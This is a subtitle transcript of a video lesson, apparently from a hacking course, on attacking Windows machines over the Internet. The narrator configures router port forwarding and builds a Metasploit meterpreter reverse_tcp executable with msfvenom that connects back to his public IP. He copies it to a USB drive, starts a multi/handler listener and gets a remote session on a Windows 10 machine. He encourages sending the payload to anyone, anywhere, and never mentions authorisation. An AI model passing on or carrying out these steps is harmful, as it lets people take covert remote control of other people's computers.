1 00:00:00,030 --> 00:00:05,340 Hello everybody and welcome back. Now in the previous videos we have seen some 2 00:00:05,339 --> 00:00:09,329 of the post exploitation modules that we can run against the target. Now those are 3 00:00:09,330 --> 00:00:13,740 just some of them. You can run basically a bunch of others as well which we will 4 00:00:13,740 --> 00:00:17,580 not cover, since there is no time for that. If you want to you can check them 5 00:00:17,580 --> 00:00:23,400 out at the Metasploit modules basically directory. Or you can just search post in 6 00:00:23,400 --> 00:00:29,760 the Metasploit framework console command. If you just open it right here with this, 7 00:00:29,760 --> 00:00:33,810 I will open it since we will need it since in this video I will show you how 8 00:00:33,809 --> 00:00:39,119 you can do the attack over the Internet. But before I do that, let me just show 9 00:00:39,120 --> 00:00:43,080 you how you can search all of the post exploitation modules. Now basically once 10 00:00:43,079 --> 00:00:47,069 this opens you just search post/windows, and it will give you all 11 00:00:47,070 --> 00:00:52,950 of the post exploitation modules that you can use on Windows. So just type here 12 00:00:52,949 --> 00:00:58,709 search post/windows and it should print out all of the, let me just zoom it 13 00:00:58,710 --> 00:01:04,110 out once again, all of the modules that you can use on Windows. These are all 14 00:01:04,110 --> 00:01:08,280 post exploitation modules as it says right here with post, and you can use 15 00:01:08,280 --> 00:01:12,270 them if you want to. For example, this could be interesting to you if 16 00:01:12,270 --> 00:01:18,210 you wanted to check out the USB history. So we, for example, know that the 17 00:01:18,210 --> 00:01:22,350 USB that we plugged in before should appear in there. Now I don't have a 18 00:01:22,350 --> 00:01:25,920 session open so I won't be running that exploit, but you can check it out if you 19 00:01:25,920 --> 00:01:31,470 wanted to. But more about that later on. What we want to do right now is perform 20 00:01:31,470 --> 00:01:36,600 our port forwarding in order to be able to do this attack on any PC in the world. 21 00:01:36,600 --> 00:01:42,900 So, how do we do port forwarding? Well, open up your Firefox. You will need to access 22 00:01:42,899 --> 00:01:47,129 your router, so you need to know your routers username and password and enter 23 00:01:47,130 --> 00:01:53,430 it. And after you do that, basically, you can just find the port forwarding 24 00:01:53,430 --> 00:01:57,870 section, so let me just show you. You just enter your routers IP, in my case my 25 00:01:57,869 --> 00:02:02,939 routers IP is .1.1, and I just click on it. It will prompt me with a 26 00:02:02,939 --> 00:02:10,499 login screen, so I just type my username and password. We do not want to save it. 27 00:02:10,500 --> 00:02:13,860 And now since everyone's router is different, what you want to find 28 00:02:13,860 --> 00:02:18,150 in your router is basically the port forwarding section. Now I'm not even sure 29 00:02:18,150 --> 00:02:24,930 where it is in mine. It should be somewhere in the, not wireless, it could be in the 30 00:02:24,930 --> 00:02:30,690 NAT. So NAT port forwarding, I found mine. And here you have a set of rules that you 31 00:02:30,690 --> 00:02:37,920 want to specify in order to perform port forwarding. So rule index, not really 32 00:02:37,920 --> 00:02:43,920 that important. Application, not important. What is important is the, well this isn't 33 00:02:43,920 --> 00:02:48,270 really...no, not this thing. The protocol under that is important. So you want to 34 00:02:48,270 --> 00:02:53,310 send TCP right here. The start port number you want to set to the port that 35 00:02:53,310 --> 00:02:57,450 you want to forward. So let's say we want to forward 5555, and 36 00:02:57,450 --> 00:03:02,280 port number should also be 5555. Local IP address is the 37 00:03:02,280 --> 00:03:08,670 IP address of your Kali Linux machine. Which currently if I run ifconfig is, 38 00:03:08,670 --> 00:03:13,760 let me just find it... 39 00:03:15,520 --> 00:03:22,210 is .1.4. So, we just type here your local IP address, you 40 00:03:22,210 --> 00:03:26,470 check it out with the ifconfig command, and then you specify it in the local IP 41 00:03:26,470 --> 00:03:31,210 address. Then the start port local can also be 5555 since 42 00:03:31,210 --> 00:03:35,080 these are the same options as well as the previous ones, which are the start 43 00:03:35,080 --> 00:03:39,640 and the end port. So once you select the port number that you want to port 44 00:03:39,640 --> 00:03:43,660 forward on your local machine, and the IP address of your local machine as we can 45 00:03:43,660 --> 00:03:48,400 see right here, what you want to click on is submit, or basically whatever it says 46 00:03:48,400 --> 00:03:55,060 for you. So once we submit we can see that right now I successfully made the 47 00:03:55,060 --> 00:04:01,390 port forward for this IP address on this port, which is good. Right now that we 48 00:04:01,390 --> 00:04:05,350 port forward it the only thing you want to do right now, which is different from 49 00:04:05,350 --> 00:04:12,460 the previous attacks, is basically change the IP address of the local host in the 50 00:04:12,460 --> 00:04:17,620 MSFvenom payload creation into the global IP address. Or basically into 51 00:04:17,620 --> 00:04:27,720 your public IP address right here. So if you just type here what is my IP, 52 00:04:30,660 --> 00:04:35,620 it will print out what is your public IP address. As it says right here, which 53 00:04:35,620 --> 00:04:40,240 currently for me is this one. And the only thing you need to do is specify in 54 00:04:40,240 --> 00:04:45,280 your payload creation, instead of the LHOST to be your local IP address, 55 00:04:45,280 --> 00:04:50,440 which is .1.4, you want to specify this IP address right here. So let me 56 00:04:50,440 --> 00:04:59,340 show you how to do that. If you just go right here, change to root, 57 00:04:59,340 --> 00:05:06,070 we check the working directory and we create the payload. So, msfvenom -p 58 00:05:06,070 --> 00:05:12,040 We want to use the same payload as 59 00:05:12,040 --> 00:05:18,970 before, so meterpreter/reverse_tcp. And right here LHOST=, instead of 60 00:05:18,970 --> 00:05:23,500 specifying local IP address what we want to paste is your public IP address right 61 00:05:23,500 --> 00:05:28,700 here. The LPORT, you want to set the LPORT to the port that you forwarded, 62 00:05:28,700 --> 00:05:33,170 which in our case is 5555. In your case if you specify the 63 00:05:33,170 --> 00:05:39,290 different port, just use the different port instead. So LPORT=5555 64 00:05:39,290 --> 00:05:43,250 and then after that we specify everything the same. So file 65 00:05:43,250 --> 00:05:52,310 .exe, and then we want to specify it to be, let's say mine shall wanshell.exe. So 66 00:05:52,310 --> 00:05:56,150 we wait for this to create our own payload. And after it creates this 67 00:05:56,150 --> 00:06:01,580 payload what you can do is, basically, you can send it to anyone you want. You can 68 00:06:01,580 --> 00:06:06,560 send it basically to a different continent on some other PC. And what that 69 00:06:06,560 --> 00:06:11,330 PC will do is it will perform a public IP connection, and it will try to 70 00:06:11,330 --> 00:06:17,060 connect to this IP on this port. And our router, since it has a rule that this 71 00:06:17,060 --> 00:06:21,980 port is forwarded to the .1.4 local IP address, will forward this 72 00:06:21,980 --> 00:06:28,340 connection to our Kali Linux machine. So now if I type here ls we can see that 73 00:06:28,340 --> 00:06:33,320 the wanshell.exe is created, and all I want to do is plug in my USB Drive. 74 00:06:33,320 --> 00:06:41,000 So, Kingston DataTraveler, or you can actually do it over Apache2 if you want to. It 75 00:06:41,000 --> 00:06:51,230 doesn't really matter. And what I want to do is cp wanshell.exe... 76 00:06:51,230 --> 00:06:59,710 we'll just do it like this. Since I need to 77 00:06:59,710 --> 00:07:06,290 specify it in a regular terminal, so what I want to do is basically copy 78 00:07:06,290 --> 00:07:12,440 wanshell.exe into my USB Drive. You can do it manually or you can do it with the 79 00:07:12,440 --> 00:07:17,540 command like this. And now we have our wanshell here. So, after we do that we 80 00:07:17,540 --> 00:07:23,990 just turn off the USB Drive, we unmount it. We also uncheck it right 81 00:07:23,990 --> 00:07:29,780 here so it goes to connect to our Windows 10 machine. And after that what 82 00:07:29,780 --> 00:07:36,680 we want to do, let me just see if it will pop up right here of if I have to replug 83 00:07:36,680 --> 00:07:41,770 it in. So let me do it like this. 84 00:07:45,520 --> 00:07:51,640 It is not popping up, it doesn't matter. What we will do is we will just go right 85 00:07:51,639 --> 00:07:56,179 here, and here is the wanshell. I put it on my desktop 86 00:07:56,180 --> 00:08:01,340 and what I want to do is basically specify a listener right now. Same as 87 00:08:01,340 --> 00:08:08,510 before. So we use, use exploit/multi/handler, set payload to windows/ 88 00:08:08,509 --> 00:08:14,809 x64/meterpreter/reverse_tcp. Now I'm going over this fast since I already 89 00:08:14,810 --> 00:08:23,660 covered it. Whoops, I made a typo. And now show options. We can see 90 00:08:23,660 --> 00:08:29,870 everything is set except the LHOST. So, set LHOST to be your local IP address 91 00:08:29,870 --> 00:08:37,550 right here. And what you want to do is just type here exploit -j -z. It will run 92 00:08:37,550 --> 00:08:43,850 it in the background. And if we run this right here, you will see that in a few 93 00:08:43,849 --> 00:08:48,759 seconds we will get a reverse shell back. 94 00:08:56,649 --> 00:08:59,899 Oops, the reason why we are not getting it, 95 00:08:59,899 --> 00:09:04,489 I just noticed right now, is because I specified right here the LPORT to be 96 00:09:04,490 --> 00:09:08,900 4444, instead it to be 5555 which is 97 00:09:08,899 --> 00:09:16,729 specified in the port forwarding rules. So let us do this once again. Use 98 00:09:16,730 --> 00:09:22,580 exploit/multi/handler. Let me just see jobs. So I kill this job that I ran, so I 99 00:09:22,580 --> 00:09:27,170 killed the first listening on point 4444. And I show my options. 100 00:09:27,170 --> 00:09:31,700 Let's see if everything is set, and now we want to change the LPORT to be 101 00:09:31,700 --> 00:09:40,250 5555. So, now that we did all that, now we can exploit -j -z. We can run 102 00:09:40,250 --> 00:09:44,360 the meterpreter, or pardon me run the listening, and now 103 00:09:44,360 --> 00:09:51,080 if we run this we get the connection from our windows 10 machine. And now this 104 00:09:51,080 --> 00:09:55,040 will work for any machine in the world. 105 00:09:55,040 --> 00:09:59,660 So, basically, wherever that machine is it will be able to connect to you, since we 106 00:09:59,660 --> 00:10:05,030 port forwarded our port to router. And we can see right now we are not even 107 00:10:05,029 --> 00:10:08,869 getting the connection from a local IP, we are getting the connection from the 108 00:10:08,870 --> 00:10:18,110 public IP. As we can see if I go sessions -i 1, get userid, we can see that we 109 00:10:18,110 --> 00:10:22,520 successfully were able to exploit a target machine that is not on our local 110 00:10:22,520 --> 00:10:26,960 network. Even though my windows 10 machine really is, but the process is 111 00:10:26,959 --> 00:10:30,799 looking like this. So with this process you will be able to connect to any 112 00:10:30,800 --> 00:10:36,650 machine in the world. So that would be about it for this tutorial. I hope you 113 00:10:36,649 --> 00:10:41,109 enjoyed it and I hope I see you in the next one. Bye!